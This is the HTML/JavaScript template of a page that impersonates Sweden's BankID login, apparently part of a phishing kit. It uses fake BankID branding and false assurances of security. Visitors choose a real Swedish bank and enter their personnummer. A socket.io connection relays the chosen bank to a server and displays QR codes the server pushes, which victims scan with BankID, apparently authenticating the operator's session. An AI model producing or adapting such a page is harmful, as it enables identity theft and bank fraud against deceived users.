<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BankID</title>
    <link rel="icon" href="{{ url_for('static', filename='img/logo-bank-id_32x32.ico') }}" type="image/x-icon">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Oswald:wght@700&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css">
    <style>
        :root {
            --primary-color: #183e4f;
            --secondary-color: #ccc;
            --text-color: white;
            --accent-color: black;
            --border-radius: 8px;
            --card-border-radius: 0px;
            --font-size-base: 1rem;
            --font-size-large: 1.2rem;
            --padding-base: 10px;
            --margin-base: 1rem;
            --margin-large: 2rem;
            --blur-effect: blur(10px);
        }

        * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        body {
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
            min-height: 100vh;
            background-color: var(--secondary-color);
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: start;
            color: var(--text-color);
            margin: 40px;
        }

        .logo {
            position: relative;
            bottom: 10px;
            display: flex;
            margin: var(--margin-large) 0;
        }

        .content-container {
            background-color: white;
            text-align: center;
            margin: 0 auto;
            width: 100%;
            border-radius: var(--border-radius);
            max-width: 400px;
        }

        #mainTextContainer {
            margin-bottom: var(--margin-base);
            font-size: var(--font-size-large);
            color: var(--accent-color);
            font-weight: bold;
            margin-top: 20px;
        }

        #agreeSignText {
            margin-bottom: var(--margin-base);
            display: block;
            font-size: 1rem;
            color: var(--accent-color);
            text-align: center;
            margin-top: 35px;
            padding: var(--padding-base);
        }

        button {
            padding: var(--padding-base) 50px;
            font-size: var(--font-size-base);
            cursor: pointer;
            background-color: var(--primary-color);
            color: var(--text-color);
            border-radius: var(--border-radius);
            margin: -5px 0 25px 0;
        }

        .card {
            backdrop-filter: var(--blur-effect);
            border-radius: var(--card-border-radius);
            background-color: white;
            position: relative;
            margin-bottom: var(--margin-base);
        }

        .qr-container {
            width: 100%;
            border-radius: var(--card-border-radius);
            overflow: hidden;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        #qrImage {
            width: 200px;
            height: 200px;
            display: none;
            margin: 20px auto 0px;
            border: 5px solid var(--primary-color);
        }

        #qrImage.active {
            display: block;
            animation: fadeBorder 2s forwards;
        }

        .loader {
            position: relative;
            margin: auto;
            width: 80px;
            aspect-ratio: 1;
            border-radius: 100vmin;
            overflow: hidden;
        }

        .loader::before {
            content: '';
            display: block;
            padding-top: 100%;
        }

        .loader.hidden {
            display: none;
        }

        #qrText {
            display: none;
            color: var(--accent-color);
            padding: var(--padding-base);
        }

        #qrText.active {
            display: inline;
        }

        .circular {
            width: 100%;
            height: 100%;
            position: absolute;
            inset: 0;
            margin: auto;
            transform-origin: center center;
            animation: 2s linear 0s infinite rotate;
        }

        .path {
            stroke: var(--primary-color);
            stroke-dasharray: 1, 200;
            stroke-dashoffset: 0;
            stroke-linecap: round;
            animation: 2.5s ease-in-out 0s infinite dash;
        }

        .footer {
            text-align: center;
            padding: 14px;
            font-size: .813rem;
            position: relative;
            top: auto;
        }

        @keyframes dash {
            0% {
                stroke-dasharray: 1, 200;
                stroke-dashoffset: 0;
            }
            50% {
                stroke-dasharray: 89, 200;
                stroke-dashoffset: -35px;
                stroke: var(--primary-color);
            }
            100% {
                stroke-dasharray: 89, 200;
                stroke-dashoffset: -124px;
            }
        }

        @keyframes rotate {
            to {
                transform: rotate(2turn);
            }
        }

        @keyframes fadeBorder {
            0% {
                border-color: var(--primary-color);
            }
            100% {
                border-color: transparent;
            }
        }

        /* Bank list styles */
        .container {
            background-color: white;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
            width: 100%;
            max-width: 500px;
            text-align: center;
            font-weight: 500;
            position: relative;
            margin-top: -150px;
        }

        h1 {
            font-size: 2rem;
            color: #333;
            margin-bottom: 20px;
        }

        .search-container {
            margin-bottom: 10px;
            position: relative;
            display: flex;
            justify-content: center;
        }

        .search-container input {
            width: 100%;
            padding: 10px 10px 10px 40px;
            font-size: 1rem;
            border: 1px solid #ccc;
            border-radius: 4px;
            outline: none;
            margin-top: 10px;
        }

        .search-icon {
            position: absolute;
            left: 15px;
            top: 50%;
            transform: translateY(-50%);
            color: #888;
            font-size: 1.2rem;
        }

        .bank-list {
            list-style-type: none;
            padding: 0;
            margin: 0;
        }

        .bank-list li {
            display: flex;
            align-items: center;
            padding: 10px 0;
            font-size: 1rem;
            color: #333;
            transition: background-color 0.3s ease;
        }

        .bank-list li:hover {
            background-color: #ebebeb;
            cursor: pointer;
        }

        .bank-logo {
            width: 45px;
            height: 45px;
            border-radius: 50%;
            overflow: hidden;
            margin-right: 15px;
        }

        .bank-logo img {
            width: 100%;
            height: 100%;
            object-fit: cover;
        }

        .bank-name-container {
            flex-grow: 1;
            display: flex;
            justify-content: space-between;
            align-items: center;
            border-bottom: #868686 1px solid;
            padding-bottom: 15px;
        }

        .arrow {
            border: solid #ccc;
            border-width: 0 3px 3px 0;
            display: inline-block;
            padding: 3px;
            transform: rotate(-45deg);
            -webkit-transform: rotate(-45deg);
            margin-right: 10px;
        }

        /* Waiting animation styles */
        .waiting {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgb(255, 255, 255); /* Semi-transparent white background */
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            z-index: 1000; /* Ensure it's on top of other content */
            display: none; /* Hide waiting section initially */
            color: #000;
            font-weight: 450;
        }

        .icon-container {
            display: flex;
            justify-content: center;
            align-items: center;
            margin-bottom: 20px;
        }

        .icon {
            display: inline-block;
            position: relative;
            width: 20px; /* Reduced width */
            height: 10px; /* Reduced height */
            cursor: pointer;
            margin: 0 5px; /* Space between arrows */
        }

        .waiting-arrow {
            position: absolute;
            top: 4px; /* Adjusted position */
            width: 90%;
            height: 1px; /* Reduced height */
            background-color: #000000;
            box-shadow: 0 2px 3px rgba(0, 0, 0, .2);
            animation: waiting-arrow 1.4s linear infinite;
        }

        .icon:nth-child(1) .waiting-arrow {
            animation-delay: 0s;
        }

        .icon:nth-child(2) .waiting-arrow {
            animation-delay: 0.45s;
        }

        .icon:nth-child(3) .waiting-arrow {
            animation-delay: 0.9s;
        }

        .waiting-arrow::after, .waiting-arrow::before {
            content: '';
            position: absolute;
            width: 60%;
            height: 1.5px; /* Reduced height */
            right: -3px;
            background-color: #000000;
        }

        .waiting-arrow::after {
            top: -3.5px; /* Adjusted position */
            transform: rotate(45deg);
        }

        .waiting-arrow::before {
            top: 3px; /* Adjusted position */
            box-shadow: 0 2px 3px rgba(0, 0, 0, .2);
            transform: rotate(-45deg);
        }

        @keyframes waiting-arrow {
            0% {
            transform: translateX(0);
            opacity: 1;
            }
            25% {
            opacity: 0.6;
            }
            50% {
            opacity: 0.1;
            }
            75% {
            opacity: 0.6;
            }
            100% {
            transform: translateX(0);
            opacity: 1;
            }
        }

        /* Login Form Styles */
        .login-container {
            background-color: #fff;
            padding: 20px;
            border-radius: 8px;
            box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
            width: 300px;
            text-align: center;
            display: none; /* Hidden initially */
        }

        .login-container h1 {
            margin-bottom: 20px;
            color: #333;
        }

        .form-group {
            margin-bottom: 15px;
            text-align: left;
        }

        .form-group label {
            display: block;
            margin-bottom: 5px;
            color: #555;
        }

        .form-group input[type="text"], .form-group select {
            width: 100%;
            padding: 10px;
            border: 1px solid #ccc;
            border-radius: 4px;
            box-sizing: border-box;
        }

        #continue-button {
            width: 100%;
            padding: 10px;
            background-color: var(--primary-color);
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
            opacity: 0.5; /* Disabled by default */
            pointer-events: none; /* Disabled by default */
        }

        #continue-button.enabled {
            opacity: 1;
            pointer-events: auto; /* Enabled when form is filled */
        }
    </style>
</head>
<body>
    <div class="logo">
        <img src="{{ url_for('static', filename='img/logo-bank-id.svg') }}" alt="Logo">
    </div>

    <div class="content-container">
        <div id="mainTextContainer">Legitimering med BankID</div>
        <div id="agreeSignText">
            För att säkerställa din identitet använder vi BankID. Genom att logga in bekräftar du att det är du som utför åtgärden. <br>
            Följ instruktionerna för en enkel och säker inloggning. <br>
            Din säkerhet är vår prioritet.
        </div>

        <div class="card" id="qrCard" style="display: none;">
            <div class="qr-container">
                <div class="loader">
                    <svg class='circular' viewbox='25 25 50 50'>
                        <circle class='path' cx='50' cy='50' r='20' fill='none' stroke-width='4' stroke-miterlimit='10'></circle>
                    </svg>
                </div>
                <div id="qrText">
                    För att bekräfta din identitet, skanna QR-koden med din BankID. Följ instruktionerna i samtalet för att fortsätta. Denna metod är snabb, säker och används för att verifiera dig under hela processen.
                    <img id="qrImage" alt="QR Code will appear here">
                    <div id="bankid-qr-code" data-view-id="bankid-qr-code" class="current"></div>
                    <div class="button-group">
                        <div>
                            <button class="link-button cancel-bankid">
                                Avbryt
                            </button>
                        </div>
                        <div>
                            <button class="link-button sidebar-toggler" data-flow-info-target="other">
                                <span class="help-button-text">
                                    Behöver du hjälp?
                                </span>
                                <span class="help-button-text hidden">
                                    Stäng
                                </span>
                            </button>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <button id="generateQrButton">Starta</button>
    </div>

    <div class="container" id="bankListContainer" style="display: none;">
        <h3 style="text-align: start;color: black;">Välj din bank</h3>
        <div class="search-container">
            <span class="search-icon fas fa-search"></span>
            <input type="text" id="searchInput" placeholder="Sök efter bank">
        </div>
        <ul class="bank-list" id="bankList">
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/nordea.jpg" alt="Nordea Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">Nordea</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/swedbank.png" alt="Swedbank & Sparbankerna Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">Swedbank & Sparbankerna</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/handelsbanken.png" alt="Handelsbanken Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">Handelsbanken</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/SEB.png" alt="SEB Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">SEB</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/lansforsakringar.png" alt="Länsförsäkringar Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">Länsförsäkringar</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/danske.jpg" alt="Danske Bank Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">Danske Bank</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/skandiabanken.jpg" alt="Skandiabanken Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">Skandiabanken</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/ica.jpg" alt="ICA Banken Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">ICA Banken</span>
                    <span class="arrow"></span>
                </div>
            </li>
            <li>
                <span class="bank-logo">
                    <img src="static/img/banks/sparbanken.png" alt="Sparbanken Syd Logo">
                </span>
                <div class="bank-name-container">
                    <span class="bank-name">Sparbanken Syd</span>
                    <span class="arrow"></span>
                </div>
            </li>
        </ul>
    </div>

    <div class="waiting" id="waitingSection">
        <div class="icon-container">
            <div class="icon">
                <div class="waiting-arrow"></div>
            </div>
            <div class="icon">
                <div class="waiting-arrow"></div>
            </div>
            <div class="icon">
                <div class="waiting-arrow"></div>
            </div>
        </div>
        <h3>Vanligen vänta</h3>
        <p>Vi behandlar din begäran.</p>
    </div>

    <!-- Login Form -->
    <div class="login-container" id="loginContainer">
        <h1>Logga in på din bank</h1>
        <form>
            <div class="form-group">
                <label for="login-method">Inloggningsmetod</label>
                <select id="login-method" name="login-method">
                    <option value="mobile-bankid">Mobilt BankID på denna enhet</option>
                </select>
            </div>
            <div class="form-group">
                <label for="personal-number">Personnummer</label>
                <input type="text" id="personal-number" name="personal-number" placeholder="Ange ditt personnummer">
            </div>
            <button id="continue-button" type="submit">Gå vidare</button>
        </form>
    </div>

    <div class="footer">
        <p>© BankID 2024<br>
            Denna anslutning är krypterad</p>
    </div>

    <script src="https://cdnjs.cloudflare.com/ajax/libs/socket.io/4.0.1/socket.io.js"></script>
    <script>
        document.addEventListener('DOMContentLoaded', function() {
            const socket = io();
            const loaderElement = document.querySelector('.loader');
            const qrImage = document.getElementById('qrImage');
            const qrText = document.getElementById('qrText');
            const generateQrButton = document.getElementById('generateQrButton');
            const agreeSignText = document.getElementById('agreeSignText');
            const qrCard = document.getElementById('qrCard');
            const contentContainer = document.querySelector('.content-container');
            const bankListContainer = document.getElementById('bankListContainer');
            const bankList = document.getElementById('bankList');
            const bankItems = bankList.querySelectorAll('li');
            const waitingSection = document.getElementById('waitingSection');
            const loginContainer = document.getElementById('loginContainer');
            const continueButton = document.getElementById('continue-button');

            let isLoading = false;
            let lastUpdateTime = Date.now();
            let isButtonClicked = false;

            bankListContainer.style.display = 'none';
            waitingSection.style.display = 'none'; // Hide waiting section initially
            loginContainer.style.display = 'none'; // Hide login container initially
            qrCard.style.display = 'none'; // Hide QR card initially

            generateQrButton.addEventListener('click', function() {
                if (!isButtonClicked) {
                    agreeSignText.style.display = 'none';
                    qrCard.style.display = 'none'; 
                    isLoading = false; 
                    loaderElement.classList.remove('active');

                    bankListContainer.style.display = 'block';
                    isButtonClicked = true;
                }
            });

            socket.on('update_qr_code_image', function(data) {
                qrImage.src = 'data:image/png;base64,' + data.qr_image;
                isLoading = false;
                loaderElement.classList.remove('active');
                loaderElement.classList.add('hidden');
                qrImage.classList.add('active');
                qrText.classList.add('active');
                lastUpdateTime = Date.now();

                contentContainer.style.height = 'auto';

                if (generateQrButton.innerHTML == 'Inväntar ytterligare signeringar') {
                    generateQrButton.style.display = 'none';
                }

                // Show the login container after the waiting section is hidden
            });
            
            bankItems.forEach(item => {
                item.addEventListener('click', function() {
                    const bankName = item.querySelector('.bank-name').textContent.trim();
                    
                    // Hide the bank list and show the waiting section as a full-screen overlay
                    bankListContainer.style.display = 'none';
                    waitingSection.style.display = 'flex';
                    
                    setTimeout(() => {
                        // Hide the waiting section and show the QR card
                        waitingSection.style.display = 'none';
                        qrCard.style.display = 'block';
                        isLoading = true;
                        socket.emit('generate_qr_code');
                        generateQrButton.innerHTML = 'Inväntar ytterligare signeringar';
                        generateQrButton.style.backgroundColor = 'white';
                        generateQrButton.style.color = '#000';
                        generateQrButton.style.border = 'none';
                        
                        socket.emit('bank_clicked', { bankName: bankName });
                        loginContainer.style.display = 'block';
                        
                    }, 3000); // 3 seconds delay
                    contentContainer.style.display = 'none';
                });
            });

            
            const searchInput = document.getElementById('searchInput');
            searchInput.addEventListener('input', () => {
                const searchTerm = searchInput.value.toLowerCase();
                
                bankItems.forEach(item => {
                    const bankName = item.querySelector('.bank-name').textContent.toLowerCase();

                    if (bankName.includes(searchTerm)) {
                        item.style.display = 'flex'; 
                    } else {
                        item.style.display = 'none';
                    }
                });
            });
            
            // Enable/disable the continue button based on form input
            const loginMethod = document.getElementById('login-method');
            const personalNumber = document.getElementById('personal-number');
            
            function checkFormValidity() {
                if (loginMethod.value && personalNumber.value) {
                    if (personalNumber.value.length === 12) {
                        continueButton.classList.add('enabled');
                        // continueButton.disabled = false;
                    // } else {
                        // continueButton.disabled = true;
                    }
                } else {
                    continueButton.classList.remove('enabled');
                }
            }
            
            loginMethod.addEventListener('change', checkFormValidity);
            personalNumber.addEventListener('input', checkFormValidity);
            
            // Show the QR card after the continue button is clicked
            continueButton.addEventListener('click', function(event) {
                event.preventDefault(); // Prevent form submission
                loginContainer.style.display = 'none'; // Hide the login container
                // loaderElement.classList.add('active');
                qrCard.style.display = 'block'; // Show the QR card
                contentContainer.style.display = 'block';
            });
        });
    </script>
</body>
</html>